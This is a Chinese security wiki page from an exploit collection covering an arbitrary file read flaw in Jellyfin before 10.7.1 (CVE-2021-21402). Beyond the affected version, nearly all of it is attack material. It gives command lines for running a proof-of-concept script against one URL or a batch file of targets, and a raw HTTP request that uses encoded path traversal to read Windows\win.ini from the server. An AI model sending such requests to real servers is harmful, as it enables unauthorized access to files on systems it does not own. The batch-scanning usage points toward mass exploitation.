menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Jellyfin chevron_right 任意文件读取漏洞(CVE-2021-21402)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    影响范围

    Jellyfin < 10.7.1

    POC

    #单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111

#批量检测
python3 CVE-2021-21402.py -f url.txt

    EXP

    GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream